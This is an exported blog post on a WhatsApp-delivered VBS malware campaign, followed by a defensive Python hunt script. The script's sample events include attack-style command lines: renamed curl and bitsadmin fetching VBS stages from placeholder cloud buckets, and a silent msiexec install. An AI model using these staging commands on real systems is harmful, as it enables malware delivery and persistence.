{"id":461,"date":"2026-04-01T14:50:34","date_gmt":"2026-04-01T14:50:34","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=461"},"modified":"2026-04-01T14:50:34","modified_gmt":"2026-04-01T14:50:34","slug":"microsoft-warns-of-whatsapp-delivered-vbs-malware-hijacking-windows-via-uac-bypass","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=461","title":{"rendered":"Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass"},"content":{"rendered":"<div>\n<p><span class=\"p-author\"><span class=\"author\">Ravie Lakshmanan<\/span> <span class=\"author\">Apr 01, 2026<\/span><\/span><span class=\"p-tags\">Social Engineering \/ Malware<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<p>Microsoft is calling attention to a new campaign that uses WhatsApp messages to distribute malicious Visual Basic Script (VBS) files.<\/p>\n<p>The activity, which began in late February 2026, uses these scripts to initiate a multi-stage infection chain that establishes persistence and enables remote access. It is currently not known what lures the threat actors use to trick users into executing the scripts.<\/p>\n<p>&#8220;The campaign relies on a combination of social engineering and living-off-the-land techniques,&#8221; the Microsoft Defender Security Research Team <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/31\/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors\/\" rel=\"noopener\" target=\"_blank\">said<\/a>. &#8220;It uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system.&#8221;<\/p>\n<p>The pairing of legitimate tools with trusted platforms is effective because it lets the threat actors blend into normal network activity: genuine Windows binaries and downloads from well-known cloud storage are unlikely to be blocked or flagged on their own, which increases the likelihood that the attack succeeds.<\/p>\n<p>The chain starts with malicious VBS files sent over WhatsApp. When executed, the scripts create hidden folders under &#8220;C:\\ProgramData&#8221; and drop renamed copies of legitimate Windows utilities: &#8220;curl.exe&#8221; is saved as &#8220;netapi.dll&#8221; and &#8220;bitsadmin.exe&#8221; as &#8220;sc.exe&#8221;. Because sc.exe is also the name of the genuine Service Control utility in System32, the renamed copy is better identified by its location under ProgramData and by the original file name recorded in its version resource than by its file name alone.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi3T2dGDeycNnwD0j2ITg_Upqq8_hKJT4EWmZNPPI9cLX7GFLeVlyCvXgJKZFnDSrOfgvykGxGdQTYWsoJ8tuSRy7OikQsfWYz2hbXnIDtCoUkV2YFMRdhRMX16boCRM_YX3Y9E11RJeogUHWZU8Xc5hU6Ehuk_ARwa_17ebTnrjnVtavofc2cXoyPEKesI\/s1700-e365\/ms-hacker.jpg\" style=\"clear: left; display: block; float: left;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi3T2dGDeycNnwD0j2ITg_Upqq8_hKJT4EWmZNPPI9cLX7GFLeVlyCvXgJKZFnDSrOfgvykGxGdQTYWsoJ8tuSRy7OikQsfWYz2hbXnIDtCoUkV2YFMRdhRMX16boCRM_YX3Y9E11RJeogUHWZU8Xc5hU6Ehuk_ARwa_17ebTnrjnVtavofc2cXoyPEKesI\/s1700-e365\/ms-hacker.jpg\" alt=\"\" border=\"0\" data-original-height=\"411\" data-original-width=\"936\"\/><\/a><\/div>\n<p>After gaining an initial foothold, the attackers work to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems. The renamed binaries are used to download auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2.<\/p>\n<p>&#8220;Once the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses,&#8221; Redmond said. &#8220;It continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\\Software\\Microsoft\\Win, and embedding persistence mechanisms to ensure the infection survives system reboots.&#8221;<\/p>\n<p>Through this combination of registry manipulation and UAC bypass techniques, the threat actors obtain elevated privileges without user interaction and then deploy unsigned MSI installers. Among these are legitimate remote access tools such as AnyDesk, which give the attackers persistent remote access they can use to exfiltrate data or deploy more malware. An unsigned package run by msiexec from a folder under C:\\ProgramData, or an AnyDesk installation that nobody requested, is a useful point at which to catch the later stages of the chain.<\/p>\n<p>&#8220;This campaign demonstrates a sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting,&#8221; Microsoft said.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Ravie Lakshmanan Apr 01, 2026 Social Engineering \/ Malware Microsoft is calling attention to a new campaign that uses WhatsApp messages to distribute malicious Visual Basic Script (VBS) files. The activity,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":462,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[394,1014,42,147,1015,1013,148,1012,307],"class_list":["post-461","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-bypass","tag-hijacking","tag-malware","tag-microsoft","tag-uac","tag-vbs","tag-warns","tag-whatsappdelivered","tag-windows"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=461"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/461\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/462"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=461"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
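The following Python script is an added example; it is not part of the article above or of Microsoft's write-up. It turns the behaviours the article describes into hunt rules over Sysmon-style process-creation events: a watched Windows utility running under a name that is not its own (curl.exe as netapi.dll, bitsadmin.exe as sc.exe, caught through the OriginalFileName field that Sysmon takes from the PE version resource), command lines that fetch from the three named cloud providers, msiexec installing a package staged under C:\ProgramData, and a burst of consent.exe launches, which is the observable side of a script that keeps re-requesting UAC elevation until someone clicks Yes. The folder C:\ProgramData\Svc, the bucket hostnames, the user name and every record in SAMPLE_EVENTS are constructed for this example; the provider domain suffixes and the addition of certutil.exe to the watch list are assumptions of mine, not indicators from the campaign.

```python
"""Hunt rules for the WhatsApp-delivered VBS chain, evaluated over Sysmon-style
process-creation events. Every event below is constructed for this example."""
import re
from datetime import datetime, timedelta
from ntpath import basename

# Windows utilities whose on-disk name should equal the OriginalFileName in their
# version resource. curl.exe and bitsadmin.exe are the two the campaign renames;
# certutil.exe is added as an assumption to widen the hunt.
WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}

# Generic storage domains of the three providers Microsoft names (AWS S3, Backblaze
# B2, Tencent Cloud COS). An assumption about hosting, not campaign IOCs.
CLOUD_SUFFIXES = (".amazonaws.com", ".backblazeb2.com", ".myqcloud.com")

URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
TS_FMT = "%Y-%m-%d %H:%M:%S"


def image_name(ev):
    """Lower-cased file name of the process image (ntpath handles Windows paths)."""
    return basename(ev["Image"]).lower()


def renamed_lolbin(ev):
    """A watched utility whose process image name is not its own name."""
    original = ev.get("OriginalFileName", "").lower()
    if original in WATCHED_ORIGINALS and image_name(ev) != original:
        return f"{original} running as {ev['Image']}"
    return None


def cloud_download(ev):
    """A command line that fetches from one of the named cloud providers."""
    hosts = [h for h in URL_RE.findall(ev.get("CommandLine", ""))
             if h.lower().endswith(CLOUD_SUFFIXES)]
    return "fetch from " + ", ".join(hosts) if hosts else None


def msi_from_programdata(ev):
    """msiexec installing a package staged under C:\\ProgramData."""
    cmd = ev.get("CommandLine", "").lower()
    if image_name(ev) == "msiexec.exe" and ".msi" in cmd and "\\programdata\\" in cmd:
        return "msiexec install from ProgramData: " + ev["CommandLine"]
    return None


def uac_prompt_burst(events, window=timedelta(seconds=60), threshold=3):
    """Each UAC consent prompt is served by a fresh consent.exe process, so a tight
    burst of consent.exe launches is what a retry-until-elevated loop looks like in
    process telemetry. Returns a one-element finding list or []."""
    times = sorted(datetime.strptime(ev["UtcTime"], TS_FMT)
                   for ev in events if image_name(ev) == "consent.exe")
    for i in range(len(times) - threshold + 1):
        if times[i + threshold - 1] - times[i] <= window:
            return [(times[i].strftime(TS_FMT), "uac_prompt_burst",
                     f"{threshold}+ UAC prompts within {int(window.total_seconds())}s")]
    return []


PER_EVENT_RULES = (renamed_lolbin, cloud_download, msi_from_programdata)


def hunt(events):
    """Run every rule; return (UtcTime, rule name, detail) triples in time order."""
    findings = []
    for ev in events:
        for rule in PER_EVENT_RULES:
            detail = rule(ev)
            if detail:
                findings.append((ev["UtcTime"], rule.__name__, detail))
    findings.extend(uac_prompt_burst(events))
    return sorted(findings)


# Constructed sample telemetry. "C:\ProgramData\Svc", the bucket names, the script
# name and the user are placeholders, not indicators taken from the article.
SAMPLE_EVENTS = [
    {"UtcTime": "2026-03-02 09:14:03", "Image": r"C:\Windows\System32\wscript.exe",
     "OriginalFileName": "wscript.exe", "ParentImage": r"C:\Users\alice\AppData\Local\WhatsApp\WhatsApp.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\doc.vbs"'},
    {"UtcTime": "2026-03-02 09:14:05", "Image": r"C:\ProgramData\Svc\netapi.dll",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\Svc\s2.vbs https://example-bucket.s3.amazonaws.com/s2.vbs"},
    {"UtcTime": "2026-03-02 09:14:06", "Image": r"C:\ProgramData\Svc\sc.exe",
     "OriginalFileName": "bitsadmin.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"sc.exe /transfer j /download /priority normal https://f000.backblazeb2.com/file/example-bucket/s3.vbs C:\ProgramData\Svc\s3.vbs"},
    {"UtcTime": "2026-03-02 09:14:20", "Image": r"C:\Windows\System32\sc.exe",  # the genuine sc.exe: no hit
     "OriginalFileName": "sc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sc.exe query wuauserv"},
    {"UtcTime": "2026-03-02 09:15:01", "Image": r"C:\Windows\System32\consent.exe",
     "OriginalFileName": "consent.exe", "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "consent.exe"},
    {"UtcTime": "2026-03-02 09:15:09", "Image": r"C:\Windows\System32\consent.exe",
     "OriginalFileName": "consent.exe", "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "consent.exe"},
    {"UtcTime": "2026-03-02 09:15:20", "Image": r"C:\Windows\System32\consent.exe",
     "OriginalFileName": "consent.exe", "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "consent.exe"},
    {"UtcTime": "2026-03-02 09:15:44", "Image": r"C:\Windows\System32\msiexec.exe",
     "OriginalFileName": "msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\Svc\host.msi /qn"},
]

if __name__ == "__main__":
    for ts, rule, detail in hunt(SAMPLE_EVENTS):
        print(ts, rule, detail)
```

Running the script prints six findings: two renamed utilities, two cloud fetches, one msiexec install from ProgramData and one UAC prompt burst. The genuine sc.exe in System32 produces nothing because its OriginalFileName matches its file name, which is why the rule keys on the version-resource name rather than the path or file name. The consent.exe threshold and window are starting points; an administrator doing real work can trigger several prompts in a minute, so tune them against your own baseline before alerting on the rule.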